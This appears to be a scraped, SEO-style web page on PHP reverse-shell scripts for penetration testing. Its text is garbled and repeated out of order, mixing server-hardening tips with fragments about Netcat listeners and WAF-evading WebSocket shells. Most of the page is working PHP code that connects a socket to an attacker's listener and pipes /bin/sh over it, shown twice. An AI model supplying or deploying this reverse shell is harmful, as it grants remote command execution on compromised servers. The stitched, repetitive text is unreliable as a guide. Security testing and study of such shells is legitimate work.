Skip to content
Your Netcat listener will receive the connection, granting you terminal access. Upgrading to a Fully Interactive TTY Shell
Top PHP Reverse Shell Scripts for Penetration Testing (2026)
: Ensure you're using a recent version of PHP with security updates.
Ensure the web server process runs as a dedicated, low-privilege user (e.g., www-data ). This limits the damage an attacker can do if they manage to execute code.
The nc terminal will show a successful connection, providing access to the target server's file system and commands. Risks and Detection
For directories where file uploads are permitted, completely disable the execution of PHP scripts.
Some advanced WAFs (Web Application Firewalls) block standard TCP outbound on non-Web ports. A WebSocket shell uses Upgrade: websocket headers, making it look like a legitimate chat application.
// Create a socket $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($sock === false) $error = socket_last_error(); echo "socket_create() failed: $error\n"; else // Connect to the attacker's listener $result = socket_connect($sock, $ip, $port); if ($result === false) $error = socket_last_error($sock); echo "socket_connect() failed: $error\n"; socket_close($sock); else // Make the shell $descriptorspec = array( 0 => array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr );
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); if (is_resource($process)) stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (true) if (feof($sock)) break; if (feof($pipes[1])) break; $read = array($sock, $pipes[1], $pipes[2]); $write = null; $except = null; if (stream_select($read, $write, $except, 1) > 0) if (in_array($sock, $read)) fwrite($pipes[0], fread($sock, 1024)); if (in_array($pipes[1], $read)) fwrite($sock, fread($pipes[1], 1024)); if (in_array($pipes[2], $read)) fwrite($sock, fread($pipes[2], 1024)); fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. 2. PentestMonkey PHP Reverse Shell
Your Netcat listener will receive the connection, granting you terminal access. Upgrading to a Fully Interactive TTY Shell
Top PHP Reverse Shell Scripts for Penetration Testing (2026)
: Ensure you're using a recent version of PHP with security updates. reverse shell php top
Ensure the web server process runs as a dedicated, low-privilege user (e.g., www-data ). This limits the damage an attacker can do if they manage to execute code.
The nc terminal will show a successful connection, providing access to the target server's file system and commands. Risks and Detection Your Netcat listener will receive the connection, granting
For directories where file uploads are permitted, completely disable the execution of PHP scripts.
Some advanced WAFs (Web Application Firewalls) block standard TCP outbound on non-Web ports. A WebSocket shell uses Upgrade: websocket headers, making it look like a legitimate chat application. This limits the damage an attacker can do
// Create a socket $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($sock === false) $error = socket_last_error(); echo "socket_create() failed: $error\n"; else // Connect to the attacker's listener $result = socket_connect($sock, $ip, $port); if ($result === false) $error = socket_last_error($sock); echo "socket_connect() failed: $error\n"; socket_close($sock); else // Make the shell $descriptorspec = array( 0 => array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr );
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); if (is_resource($process)) stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (true) if (feof($sock)) break; if (feof($pipes[1])) break; $read = array($sock, $pipes[1], $pipes[2]); $write = null; $except = null; if (stream_select($read, $write, $except, 1) > 0) if (in_array($sock, $read)) fwrite($pipes[0], fread($sock, 1024)); if (in_array($pipes[1], $read)) fwrite($sock, fread($pipes[1], 1024)); if (in_array($pipes[2], $read)) fwrite($sock, fread($pipes[2], 1024)); fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. 2. PentestMonkey PHP Reverse Shell